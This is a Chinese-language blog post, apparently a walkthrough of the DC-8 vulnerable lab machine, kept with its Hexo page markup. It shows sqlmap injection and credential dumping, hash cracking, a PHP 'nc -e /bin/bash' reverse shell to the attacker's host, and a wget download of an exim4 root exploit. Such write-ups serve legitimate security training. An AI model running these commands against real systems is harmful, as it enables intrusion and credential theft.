<!DOCTYPE html>
<html lang="zh-CN">
<head>
  <meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=2">
<meta name="theme-color" content="#222">
<meta name="generator" content="Hexo 6.3.0">
  <link rel="apple-touch-icon" sizes="180x180" href="/images/apple-touch-icon-next.png">
  <link rel="icon" type="image/png" sizes="32x32" href="/images/favicon-32x32-next.png">
  <link rel="icon" type="image/png" sizes="16x16" href="/images/favicon-16x16-next.png">
  <link rel="mask-icon" href="/images/logo.svg" color="#222">

<link rel="stylesheet" href="/css/main.css">


<link rel="stylesheet" href="/lib/font-awesome/css/all.min.css">

<script id="hexo-configurations">
    var NexT = window.NexT || {};
    var CONFIG = {"hostname":"example.com","root":"/","scheme":"Pisces","version":"7.8.0","exturl":false,"sidebar":{"position":"left","display":"post","padding":18,"offset":12,"onmobile":true},"copycode":{"enable":true,"show_result":true,"style":null},"back2top":{"enable":true,"sidebar":true,"scrollpercent":true},"bookmark":{"enable":false,"color":"#222","save":"auto"},"fancybox":false,"mediumzoom":false,"lazyload":false,"pangu":false,"comments":{"style":"tabs","active":null,"storage":true,"lazyload":false,"nav":null},"algolia":{"hits":{"per_page":10},"labels":{"input_placeholder":"Search for Posts","hits_empty":"We didn't find any results for the search: ${query}","hits_stats":"${hits} results found in ${time} ms"}},"localsearch":{"enable":false,"trigger":"auto","top_n_per_article":1,"unescape":false,"preload":false},"motion":{"enable":true,"async":false,"transition":{"post_block":"fadeIn","post_header":"slideDownIn","post_body":"slideDownIn","coll_header":"slideLeftIn","sidebar":"slideUpIn"}}};
  </script>

  <meta name="description" content="渗透靶机DC-8">
<meta property="og:type" content="article">
<meta property="og:title" content="渗透DC-8">
<meta property="og:url" content="http://example.com/2023/12/22/%E6%B8%97%E9%80%8FDC-8/index.html">
<meta property="og:site_name" content="zzZxby&#39;s blog">
<meta property="og:description" content="渗透靶机DC-8">
<meta property="og:locale" content="zh_CN">
<meta property="og:image" content="http://example.com/2023/12/22/%E6%B8%97%E9%80%8FDC-8/image-20231222194347930.png">
<meta property="og:image" content="http://example.com/2023/12/22/%E6%B8%97%E9%80%8FDC-8/image-20231222194735357.png">
<meta property="og:image" content="http://example.com/2023/12/22/%E6%B8%97%E9%80%8FDC-8/image-20231222195053538.png">
<meta property="og:image" content="http://example.com/2023/12/22/%E6%B8%97%E9%80%8FDC-8/image-20231222195356934.png">
<meta property="og:image" content="http://example.com/2023/12/22/%E6%B8%97%E9%80%8FDC-8/image-20231222195836976.png">
<meta property="og:image" content="http://example.com/2023/12/22/%E6%B8%97%E9%80%8FDC-8/image-20231222195934908.png">
<meta property="og:image" content="http://example.com/2023/12/22/%E6%B8%97%E9%80%8FDC-8/image-20231222200009017.png">
<meta property="og:image" content="http://example.com/2023/12/22/%E6%B8%97%E9%80%8FDC-8/image-20231222200512826.png">
<meta property="og:image" content="http://example.com/2023/12/22/%E6%B8%97%E9%80%8FDC-8/image-20231222200711551.png">
<meta property="og:image" content="http://example.com/2023/12/22/%E6%B8%97%E9%80%8FDC-8/image-20231222200753056.png">
<meta property="og:image" content="http://example.com/2023/12/22/%E6%B8%97%E9%80%8FDC-8/image-20231222200856356.png">
<meta property="og:image" content="http://example.com/2023/12/22/%E6%B8%97%E9%80%8FDC-8/image-20231222201132639.png">
<meta property="og:image" content="http://example.com/2023/12/22/%E6%B8%97%E9%80%8FDC-8/image-20231222201437342.png">
<meta property="og:image" content="http://example.com/2023/12/22/%E6%B8%97%E9%80%8FDC-8/image-20231222201544480.png">
<meta property="og:image" content="http://example.com/2023/12/22/%E6%B8%97%E9%80%8FDC-8/image-20231222201855982.png">
<meta property="og:image" content="http://example.com/2023/12/22/%E6%B8%97%E9%80%8FDC-8/image-20231222202127902.png">
<meta property="og:image" content="http://example.com/2023/12/22/%E6%B8%97%E9%80%8FDC-8/image-20231222202143431.png">
<meta property="og:image" content="http://example.com/2023/12/22/%E6%B8%97%E9%80%8FDC-8/image-20231222202157762.png">
<meta property="og:image" content="http://example.com/2023/12/22/%E6%B8%97%E9%80%8FDC-8/image-20231222204040658.png">
<meta property="og:image" content="http://example.com/2023/12/22/%E6%B8%97%E9%80%8FDC-8/image-20231222203831274.png">
<meta property="og:image" content="http://example.com/2023/12/22/%E6%B8%97%E9%80%8FDC-8/image-20231222203914508.png">
<meta property="og:image" content="http://example.com/2023/12/22/%E6%B8%97%E9%80%8FDC-8/image-20231222204224598.png">
<meta property="og:image" content="http://example.com/2023/12/22/%E6%B8%97%E9%80%8FDC-8/image-20231222204316946.png">
<meta property="og:image" content="http://example.com/2023/12/22/%E6%B8%97%E9%80%8FDC-8/image-20231222204616295.png">
<meta property="og:image" content="http://example.com/2023/12/22/%E6%B8%97%E9%80%8FDC-8/image-20231222204707440.png">
<meta property="og:image" content="http://example.com/2023/12/22/%E6%B8%97%E9%80%8FDC-8/image-20231222204811606.png">
<meta property="og:image" content="http://example.com/2023/12/22/%E6%B8%97%E9%80%8FDC-8/image-20231222204915892.png">
<meta property="og:image" content="http://example.com/2023/12/22/%E6%B8%97%E9%80%8FDC-8/image-20231222205131948.png">
<meta property="og:image" content="http://example.com/2023/12/22/%E6%B8%97%E9%80%8FDC-8/image-20231222205452031.png">
<meta property="og:image" content="http://example.com/2023/12/22/%E6%B8%97%E9%80%8FDC-8/image-20231222205632083.png">
<meta property="og:image" content="http://example.com/2023/12/22/%E6%B8%97%E9%80%8FDC-8/image-20231222205742038.png">
<meta property="og:image" content="http://example.com/2023/12/22/%E6%B8%97%E9%80%8FDC-8/image-20231222210236246.png">
<meta property="og:image" content="http://example.com/2023/12/22/%E6%B8%97%E9%80%8FDC-8/image-20231222210302524.png">
<meta property="og:image" content="http://example.com/2023/12/22/%E6%B8%97%E9%80%8FDC-8/image-20231222210318496.png">
<meta property="article:published_time" content="2023-12-22T13:16:02.000Z">
<meta property="article:modified_time" content="2023-12-22T13:29:13.366Z">
<meta property="article:author" content="zzZxby">
<meta property="article:tag" content="保持学习的热情">
<meta name="twitter:card" content="summary">
<meta name="twitter:image" content="http://example.com/2023/12/22/%E6%B8%97%E9%80%8FDC-8/image-20231222194347930.png">

<link rel="canonical" href="http://example.com/2023/12/22/%E6%B8%97%E9%80%8FDC-8/">


<script id="page-configurations">
  // https://hexo.io/docs/variables.html
  CONFIG.page = {
    sidebar: "",
    isHome : false,
    isPost : true,
    lang   : 'zh-CN'
  };
</script>

  <title>渗透DC-8 | zzZxby's blog</title>
  






  <noscript>
  <style>
  .use-motion .brand,
  .use-motion .menu-item,
  .sidebar-inner,
  .use-motion .post-block,
  .use-motion .pagination,
  .use-motion .comments,
  .use-motion .post-header,
  .use-motion .post-body,
  .use-motion .collection-header { opacity: initial; }

  .use-motion .site-title,
  .use-motion .site-subtitle {
    opacity: initial;
    top: initial;
  }

  .use-motion .logo-line-before i { left: initial; }
  .use-motion .logo-line-after i { right: initial; }
  </style>
</noscript>

<style>mjx-container[jax="SVG"] {
  direction: ltr;
}

mjx-container[jax="SVG"] > svg {
  overflow: visible;
}

mjx-container[jax="SVG"][display="true"] {
  display: block;
  text-align: center;
  margin: 1em 0;
}

mjx-container[jax="SVG"][justify="left"] {
  text-align: left;
}

mjx-container[jax="SVG"][justify="right"] {
  text-align: right;
}

g[data-mml-node="merror"] > g {
  fill: red;
  stroke: red;
}

g[data-mml-node="merror"] > rect[data-background] {
  fill: yellow;
  stroke: none;
}

g[data-mml-node="mtable"] > line[data-line] {
  stroke-width: 70px;
  fill: none;
}

g[data-mml-node="mtable"] > rect[data-frame] {
  stroke-width: 70px;
  fill: none;
}

g[data-mml-node="mtable"] > .mjx-dashed {
  stroke-dasharray: 140;
}

g[data-mml-node="mtable"] > .mjx-dotted {
  stroke-linecap: round;
  stroke-dasharray: 0,140;
}

g[data-mml-node="mtable"] > svg {
  overflow: visible;
}

[jax="SVG"] mjx-tool {
  display: inline-block;
  position: relative;
  width: 0;
  height: 0;
}

[jax="SVG"] mjx-tool > mjx-tip {
  position: absolute;
  top: 0;
  left: 0;
}

mjx-tool > mjx-tip {
  display: inline-block;
  padding: .2em;
  border: 1px solid #888;
  font-size: 70%;
  background-color: #F8F8F8;
  color: black;
  box-shadow: 2px 2px 5px #AAAAAA;
}

g[data-mml-node="maction"][data-toggle] {
  cursor: pointer;
}

mjx-status {
  display: block;
  position: fixed;
  left: 1em;
  bottom: 1em;
  min-width: 25%;
  padding: .2em .4em;
  border: 1px solid #888;
  font-size: 90%;
  background-color: #F8F8F8;
  color: black;
}

foreignObject[data-mjx-xml] {
  font-family: initial;
  line-height: normal;
  overflow: visible;
}

.MathJax path {
  stroke-width: 3;
}

mjx-container[display="true"] {
  overflow: auto hidden;
}

mjx-container[display="true"] + br {
  display: none;
}
</style></head>

<body itemscope itemtype="http://schema.org/WebPage">
<link rel="stylesheet" href="/dist/APlayer.min.css">
<div id="aplayer"></div>
<script type="text/javascript" src="/dist/APlayer.min.js"></script>
<script type="text/javascript" src="/dist/music.js"></script>




  <div class="container use-motion">
    <div class="headband"></div>

    <header class="header" itemscope itemtype="http://schema.org/WPHeader">
      <div class="header-inner"><div class="site-brand-container">
  <div class="site-nav-toggle">
    <div class="toggle" aria-label="切换导航栏">
      <span class="toggle-line toggle-line-first"></span>
      <span class="toggle-line toggle-line-middle"></span>
      <span class="toggle-line toggle-line-last"></span>
    </div>
  </div>

  <div class="site-meta">

    <a href="/" class="brand" rel="start">
      <span class="logo-line-before"><i></i></span>
      <h1 class="site-title">zzZxby's blog</h1>
      <span class="logo-line-after"><i></i></span>
    </a>
  </div>

  <div class="site-nav-right">
    <div class="toggle popup-trigger">
    </div>
  </div>
</div>




<nav class="site-nav">
  <ul id="menu" class="main-menu menu">
        <li class="menu-item menu-item-home">

    <a href="/" rel="section"><i class="fa fa-home fa-fw"></i>首页</a>

  </li>
        <li class="menu-item menu-item-archives">

    <a href="/archives/" rel="section"><i class="fa fa-archive fa-fw"></i>归档</a>

  </li>
  </ul>
</nav>




</div>
    </header>

    


    <main class="main">
      <div class="main-inner">
        <div class="content-wrap">
          

          <div class="content post posts-expand">
            

    
  
  
  <article itemscope itemtype="http://schema.org/Article" class="post-block" lang="zh-CN">
    <link itemprop="mainEntityOfPage" href="http://example.com/2023/12/22/%E6%B8%97%E9%80%8FDC-8/">

    <span hidden itemprop="author" itemscope itemtype="http://schema.org/Person">
      <meta itemprop="image" content="/images/zzZ.jpg">
      <meta itemprop="name" content="zzZxby">
      <meta itemprop="description" content="看山是山，看水是水">
    </span>

    <span hidden itemprop="publisher" itemscope itemtype="http://schema.org/Organization">
      <meta itemprop="name" content="zzZxby's blog">
    </span>
      <header class="post-header">
        <h1 class="post-title" itemprop="name headline">
          渗透DC-8
        </h1>

        <div class="post-meta">
            <span class="post-meta-item">
              <span class="post-meta-item-icon">
                <i class="far fa-calendar"></i>
              </span>
              <span class="post-meta-item-text">发表于</span>
              

              <time title="创建时间：2023-12-22 21:16:02 / 修改时间：21:29:13" itemprop="dateCreated datePublished" datetime="2023-12-22T21:16:02+08:00">2023-12-22</time>
            </span>

          <br>
            <span class="post-meta-item" title="本文字数">
              <span class="post-meta-item-icon">
                <i class="far fa-file-word"></i>
              </span>
                <span class="post-meta-item-text">本文字数：</span>
              <span>979</span>
            </span>
            <span class="post-meta-item" title="阅读时长">
              <span class="post-meta-item-icon">
                <i class="far fa-clock"></i>
              </span>
                <span class="post-meta-item-text">阅读时长 &asymp;</span>
              <span>4 分钟</span>
            </span>
            <div class="post-description">渗透靶机DC-8</div>

        </div>
      </header>

    
    
    
    <div class="post-body" itemprop="articleBody">

      
        <h1 id="靶机描述">靶机描述</h1>
<p>下载地址：http://www.five86.com/downloads/DC-8.zip</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br></pre></td><td class="code"><pre><span class="line">DC-8 is another purposely built vulnerable lab with the intent of gaining experience in the world of penetration testing.</span><br><span class="line"></span><br><span class="line">This challenge is a bit of a hybrid between being an actual challenge, and being a "proof of concept" as to whether two-factor authentication installed and configured on Linux can prevent the Linux server from being exploited.</span><br><span class="line"></span><br><span class="line">The "proof of concept" portion of this challenge eventuated as a result of a question being asked about two-factor authentication and Linux on Twitter, and also due to a suggestion by @theart42.</span><br><span class="line"></span><br><span class="line">The ultimate goal of this challenge is to bypass two-factor authentication, get root and to read the one and only flag.</span><br><span class="line"></span><br><span class="line">You probably wouldn't even know that two-factor authentication was installed and configured unless you attempt to login via SSH, but it's definitely there and doing it's job.</span><br><span class="line"></span><br><span class="line">Linux skills and familiarity with the Linux command line are a must, as is some experience with basic penetration testing tools.</span><br><span class="line"></span><br><span class="line">For beginners, Google can be of great assistance, but you can always tweet me at @DCAU7 for assistance to get you going again. But take note: I won't give you the answer, instead, I'll give you an idea about how to move forward.</span><br></pre></td></tr></table></figure>
<h1 id="信息收集">信息收集</h1>
<p>扫描同网段存活主机</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">arp-scan -l</span><br></pre></td></tr></table></figure>
<p><img src="/2023/12/22/%E6%B8%97%E9%80%8FDC-8/image-20231222194347930.png"></p>
<p>扫描目标主机开放端口，发现开放了22和80端口</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">nmap -A　172.18.1.144</span><br></pre></td></tr></table></figure>
<p><img src="/2023/12/22/%E6%B8%97%E9%80%8FDC-8/image-20231222194735357.png"></p>
<p>访问web应用</p>
<p><img src="/2023/12/22/%E6%B8%97%E9%80%8FDC-8/image-20231222195053538.png"></p>
<p>查看web应用基本信息，发现和上一个靶机用的相同的cms</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">whatweb -v http://172.18.1.144/</span><br></pre></td></tr></table></figure>
<p><img src="/2023/12/22/%E6%B8%97%E9%80%8FDC-8/image-20231222195356934.png"></p>
<p>目录扫描，也没有一些有用的信息，只有一个user/login界面，这个我们后面会用到</p>
<p>继续在web页面中信息收集</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">dirsearch -u http://172.18.1.144/ -i 200</span><br></pre></td></tr></table></figure>
<p><img src="/2023/12/22/%E6%B8%97%E9%80%8FDC-8/image-20231222195836976.png"></p>
<p>当我们点击页面红框中的内容时，url的参数发生改变</p>
<p><img src="/2023/12/22/%E6%B8%97%E9%80%8FDC-8/image-20231222195934908.png"></p>
<p>加上单引号之后，页面报错，说明存在sql注入漏洞</p>
<p><img src="/2023/12/22/%E6%B8%97%E9%80%8FDC-8/image-20231222200009017.png"></p>
<h1 id="渗透阶段">渗透阶段</h1>
<p>利用sqlmap测试注入点，先查看当前数据库名称</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">sqlmap -u "http://172.18.1.144/?nid=3" --current-db</span><br></pre></td></tr></table></figure>
<p><img src="/2023/12/22/%E6%B8%97%E9%80%8FDC-8/image-20231222200512826.png"></p>
<p>然后测表名</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">sqlmap -u "http://172.18.1.144/?nid=3" -D 'd7db' -tables</span><br></pre></td></tr></table></figure>
<p><img src="/2023/12/22/%E6%B8%97%E9%80%8FDC-8/image-20231222200711551.png"></p>
<p>我们主要是为了找这个user表，然后尝试登录到用户管理界面</p>
<p><img src="/2023/12/22/%E6%B8%97%E9%80%8FDC-8/image-20231222200753056.png"></p>
<p>然后就需要测字段名</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">sqlmap -u "http://172.18.1.144/?nid=3" -D 'd7db' -T 'users' --columns</span><br></pre></td></tr></table></figure>
<p><img src="/2023/12/22/%E6%B8%97%E9%80%8FDC-8/image-20231222200856356.png"></p>
<p>表里存在用户和密码，那我们就继续使用sqlmap把关键字段dump出来</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">sqlmap -u "http://172.18.1.144/?nid=3" -D 'd7db' -T 'users' -C 'name,pass' --dump</span><br></pre></td></tr></table></figure>
<p>得到两个用户和加密后的密码</p>
<p><img src="/2023/12/22/%E6%B8%97%E9%80%8FDC-8/image-20231222201132639.png"></p>
<p>有了hash密码，可以用john爆破密码</p>
<p>先将密码保存到桌面为pwd.txt，然后运行命令</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">john /root/桌面/pwd.txt </span><br></pre></td></tr></table></figure>
<p><img src="/2023/12/22/%E6%B8%97%E9%80%8FDC-8/image-20231222201437342.png"></p>
<p>得到一个密码turtle</p>
<p><img src="/2023/12/22/%E6%B8%97%E9%80%8FDC-8/image-20231222201544480.png"></p>
<p>有了账号密码，我们就可以登录web页面了</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">后台登录地址：http://172.18.1.144/user/login（扫描目录得到的）</span><br></pre></td></tr></table></figure>
<p>测试发现，爆破出来的密码是用户john的</p>
<p>成功登录后台</p>
<p><img src="/2023/12/22/%E6%B8%97%E9%80%8FDC-8/image-20231222201855982.png"></p>
<p>这个cms后台和上一个靶机相似，后台都有一个写反弹shell的地方</p>
<p><img src="/2023/12/22/%E6%B8%97%E9%80%8FDC-8/image-20231222202127902.png"></p>
<p><img src="/2023/12/22/%E6%B8%97%E9%80%8FDC-8/image-20231222202143431.png"></p>
<p><img src="/2023/12/22/%E6%B8%97%E9%80%8FDC-8/image-20231222202157762.png"></p>
<p>这里可以写个php反弹shell代码，然后kali设置监听端口</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">&lt;p&gt;shell&lt;/p&gt;</span><br><span class="line">&lt;?php</span><br><span class="line">@exec("nc -e /bin/bash 172.18.1.128 5566");</span><br><span class="line">?&gt; </span><br></pre></td></tr></table></figure>
<p><img src="/2023/12/22/%E6%B8%97%E9%80%8FDC-8/image-20231222204040658.png"></p>
<p>保存后先开kali的监听端口</p>
<p><img src="/2023/12/22/%E6%B8%97%E9%80%8FDC-8/image-20231222203831274.png"></p>
<p>然后提交信息（多点几次），触发php代码</p>
<p><img src="/2023/12/22/%E6%B8%97%E9%80%8FDC-8/image-20231222203914508.png"></p>
<p><img src="/2023/12/22/%E6%B8%97%E9%80%8FDC-8/image-20231222204224598.png"></p>
<p>利用python升级shell</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">python -c 'import pty; pty.spawn("/bin/bash")'</span><br></pre></td></tr></table></figure>
<p><img src="/2023/12/22/%E6%B8%97%E9%80%8FDC-8/image-20231222204316946.png"></p>
<h1 id="提权">提权</h1>
<p>利用suid提权，查看可提权文件</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">find / -perm -4000 -print 2&gt;/dev/null</span><br></pre></td></tr></table></figure>
<p>发现一个我们之前遇到但没用过的exim4</p>
<p><img src="/2023/12/22/%E6%B8%97%E9%80%8FDC-8/image-20231222204616295.png"></p>
<p><img src="/2023/12/22/%E6%B8%97%E9%80%8FDC-8/image-20231222204707440.png"></p>
<p>查看exim的版本信息</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">exim4 --version</span><br></pre></td></tr></table></figure>
<p><img src="/2023/12/22/%E6%B8%97%E9%80%8FDC-8/image-20231222204811606.png"></p>
<p>搜索相关的漏洞</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">searchsploit exim</span><br></pre></td></tr></table></figure>
<p><img src="/2023/12/22/%E6%B8%97%E9%80%8FDC-8/image-20231222204915892.png"></p>
<p>切换到桌面目录下，然后讲文件拷贝到当前目录下</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">searchsploit -m 46996</span><br></pre></td></tr></table></figure>
<p><img src="/2023/12/22/%E6%B8%97%E9%80%8FDC-8/image-20231222205131948.png"></p>
<p>kali开启http服务</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">python -m http.server 8888 </span><br></pre></td></tr></table></figure>
<p>然后在靶机的shell里远程下载此文件，需要注意，切换到靶机的tmp目录下进行下载，防止文件读写权限错误</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">wget 172.18.1.128:8888/46996.sh</span><br></pre></td></tr></table></figure>
<p><img src="/2023/12/22/%E6%B8%97%E9%80%8FDC-8/image-20231222205452031.png"></p>
<p>exp下载成功，我们看下如何使用这个exp，文档中有使用方法</p>
<p><img src="/2023/12/22/%E6%B8%97%E9%80%8FDC-8/image-20231222205632083.png"></p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">./46996.sh -m netcat</span><br></pre></td></tr></table></figure>
<p>直接执行发现没有权限，查看文件的权限</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">ls -la</span><br></pre></td></tr></table></figure>
<p><img src="/2023/12/22/%E6%B8%97%E9%80%8FDC-8/image-20231222205742038.png"></p>
<p>chmod赋权</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">chmod 777 46996.sh</span><br><span class="line">./46996.sh -m netcat</span><br></pre></td></tr></table></figure>
<p>成功之后，需要操作快一点，这个root权限维持不稳定</p>
<p><img src="/2023/12/22/%E6%B8%97%E9%80%8FDC-8/image-20231222210236246.png"></p>
<h1 id="查找flag">查找flag</h1>
<p>flag就在root用户下，切换目录就行</p>
<p><img src="/2023/12/22/%E6%B8%97%E9%80%8FDC-8/image-20231222210302524.png"></p>
<p><img src="/2023/12/22/%E6%B8%97%E9%80%8FDC-8/image-20231222210318496.png"></p>
<h1 id="总结">总结</h1>
<ul>
<li>sql注入点的判断</li>
<li>sqlmap进行sql注入</li>
<li>john爆破hash</li>
<li>php反弹shell</li>
<li>suid之exim4提权</li>
</ul>

    </div>

    
    
    

      <footer class="post-footer">

        


        
    <div class="post-nav">
      <div class="post-nav-item">
    <a href="/2023/12/20/%E6%B8%97%E9%80%8FDC-7/" rel="prev" title="渗透DC-7">
      <i class="fa fa-chevron-left"></i> 渗透DC-7
    </a></div>
      <div class="post-nav-item"></div>
    </div>
      </footer>
    
  </article>
  
  
  



          </div>
          

<script>
  window.addEventListener('tabs:register', () => {
    let { activeClass } = CONFIG.comments;
    if (CONFIG.comments.storage) {
      activeClass = localStorage.getItem('comments_active') || activeClass;
    }
    if (activeClass) {
      let activeTab = document.querySelector(`a[href="#comment-${activeClass}"]`);
      if (activeTab) {
        activeTab.click();
      }
    }
  });
  if (CONFIG.comments.storage) {
    window.addEventListener('tabs:click', event => {
      if (!event.target.matches('.tabs-comment .tab-content .tab-pane')) return;
      let commentClass = event.target.classList[1];
      localStorage.setItem('comments_active', commentClass);
    });
  }
</script>

        </div>
          
  
  <div class="toggle sidebar-toggle">
    <span class="toggle-line toggle-line-first"></span>
    <span class="toggle-line toggle-line-middle"></span>
    <span class="toggle-line toggle-line-last"></span>
  </div>

  <aside class="sidebar">
    <div class="sidebar-inner">

      <ul class="sidebar-nav motion-element">
        <li class="sidebar-nav-toc">
          文章目录
        </li>
        <li class="sidebar-nav-overview">
          站点概览
        </li>
      </ul>

      <!--noindex-->
      <div class="post-toc-wrap sidebar-panel">
          <div class="post-toc motion-element"><ol class="nav"><li class="nav-item nav-level-1"><a class="nav-link" href="#%E9%9D%B6%E6%9C%BA%E6%8F%8F%E8%BF%B0"><span class="nav-number">1.</span> <span class="nav-text">靶机描述</span></a></li><li class="nav-item nav-level-1"><a class="nav-link" href="#%E4%BF%A1%E6%81%AF%E6%94%B6%E9%9B%86"><span class="nav-number">2.</span> <span class="nav-text">信息收集</span></a></li><li class="nav-item nav-level-1"><a class="nav-link" href="#%E6%B8%97%E9%80%8F%E9%98%B6%E6%AE%B5"><span class="nav-number">3.</span> <span class="nav-text">渗透阶段</span></a></li><li class="nav-item nav-level-1"><a class="nav-link" href="#%E6%8F%90%E6%9D%83"><span class="nav-number">4.</span> <span class="nav-text">提权</span></a></li><li class="nav-item nav-level-1"><a class="nav-link" href="#%E6%9F%A5%E6%89%BEflag"><span class="nav-number">5.</span> <span class="nav-text">查找flag</span></a></li><li class="nav-item nav-level-1"><a class="nav-link" href="#%E6%80%BB%E7%BB%93"><span class="nav-number">6.</span> <span class="nav-text">总结</span></a></li></ol></div>
      </div>
      <!--/noindex-->

      <div class="site-overview-wrap sidebar-panel">
        <div class="site-author motion-element" itemprop="author" itemscope itemtype="http://schema.org/Person">
    <img class="site-author-image" itemprop="image" alt="zzZxby"
      src="/images/zzZ.jpg">
  <p class="site-author-name" itemprop="name">zzZxby</p>
  <div class="site-description" itemprop="description">看山是山，看水是水</div>
</div>
<div class="site-state-wrap motion-element">
  <nav class="site-state">
      <div class="site-state-item site-state-posts">
          <a href="/archives/">
        
          <span class="site-state-item-count">31</span>
          <span class="site-state-item-name">日志</span>
        </a>
      </div>
  </nav>
</div>



      </div>
        <div class="back-to-top motion-element">
          <i class="fa fa-arrow-up"></i>
          <span>0%</span>
        </div>

    </div>
  </aside>
  <div id="sidebar-dimmer"></div>


      </div>
    </main>

    <footer class="footer">
      <div class="footer-inner">
        

        

<div class="copyright">
  
  &copy; 
  <span itemprop="copyrightYear">2023</span>
  <span class="with-love">
    <i class="fa fa-heart"></i>
  </span>
  <span class="author" itemprop="copyrightHolder">zzZxby</span>
    <span class="post-meta-divider">|</span>
    <span class="post-meta-item-icon">
      <i class="fa fa-chart-area"></i>
    </span>
      <span class="post-meta-item-text">站点总字数：</span>
    <span title="站点总字数">47k</span>
    <span class="post-meta-divider">|</span>
    <span class="post-meta-item-icon">
      <i class="fa fa-coffee"></i>
    </span>
      <span class="post-meta-item-text">站点阅读时长 &asymp;</span>
    <span title="站点阅读时长">2:52</span>
</div>

        








      </div>
    </footer>
  </div>

  
  <script src="/lib/anime.min.js"></script>
  <script src="/lib/pjax/pjax.min.js"></script>
  <script src="/lib/velocity/velocity.min.js"></script>
  <script src="/lib/velocity/velocity.ui.min.js"></script>

<script src="/js/utils.js"></script>

<script src="/js/motion.js"></script>


<script src="/js/schemes/pisces.js"></script>


<script src="/js/next-boot.js"></script>

  <script>
var pjax = new Pjax({
  selectors: [
    'head title',
    '#page-configurations',
    '.content-wrap',
    '.post-toc-wrap',
    '.languages',
    '#pjax'
  ],
  switches: {
    '.post-toc-wrap': Pjax.switches.innerHTML
  },
  analytics: false,
  cacheBust: false,
  scrollTo : !CONFIG.bookmark.enable
});

window.addEventListener('pjax:success', () => {
  document.querySelectorAll('script[data-pjax], script#page-configurations, #pjax script').forEach(element => {
    var code = element.text || element.textContent || element.innerHTML || '';
    var parent = element.parentNode;
    parent.removeChild(element);
    var script = document.createElement('script');
    if (element.id) {
      script.id = element.id;
    }
    if (element.className) {
      script.className = element.className;
    }
    if (element.type) {
      script.type = element.type;
    }
    if (element.src) {
      script.src = element.src;
      // Force synchronous loading of peripheral JS.
      script.async = false;
    }
    if (element.dataset.pjax !== undefined) {
      script.dataset.pjax = '';
    }
    if (code !== '') {
      script.appendChild(document.createTextNode(code));
    }
    parent.appendChild(script);
  });
  NexT.boot.refresh();
  // Define Motion Sequence & Bootstrap Motion.
  if (CONFIG.motion.enable) {
    NexT.motion.integrator
      .init()
      .add(NexT.motion.middleWares.subMenu)
      .add(NexT.motion.middleWares.postList)
      .bootstrap();
  }
  NexT.utils.updateSidebarPosition();
});
</script>


  <script defer src="/lib/three/three.min.js"></script>
    <script defer src="/lib/three/canvas_lines.min.js"></script>


  















    <div id="pjax">
  

  
      

<script>
  if (typeof MathJax === 'undefined') {
    // window.MathJax = {
    //   loader: {
    //
    //       load: ['[tex]/mhchem'],
    //
    //     source: {
    //       '[tex]/amsCd': '[tex]/amscd',
    //       '[tex]/AMScd': '[tex]/amscd'
    //     }
    //   },
    //   tex: {
    //     inlineMath: {'[+]': [['$', '$']]},
    //
    //       packages: {'[+]': ['mhchem']},
    //
    //     tags: 'ams'
    //   },
    //   options: {
    //     renderActions: {
    //       findScript: [10, doc => {
    //         document.querySelectorAll('script[type^="math/tex"]').forEach(node => {
    //           const display = !!node.type.match(/; *mode=display/);
    //           const math = new doc.options.MathItem(node.textContent, doc.inputJax[0], display);
    //           const text = document.createTextNode('');
    //           node.parentNode.replaceChild(text, node);
    //           math.start = {node: text, delim: '', n: 0};
    //           math.end = {node: text, delim: '', n: 0};
    //           doc.math.push(math);
    //         });
    //       }, '', false],
    //       insertedScript: [200, () => {
    //         document.querySelectorAll('mjx-container').forEach(node => {
    //           let target = node.parentNode;
    //           if (target.nodeName.toLowerCase() === 'li') {
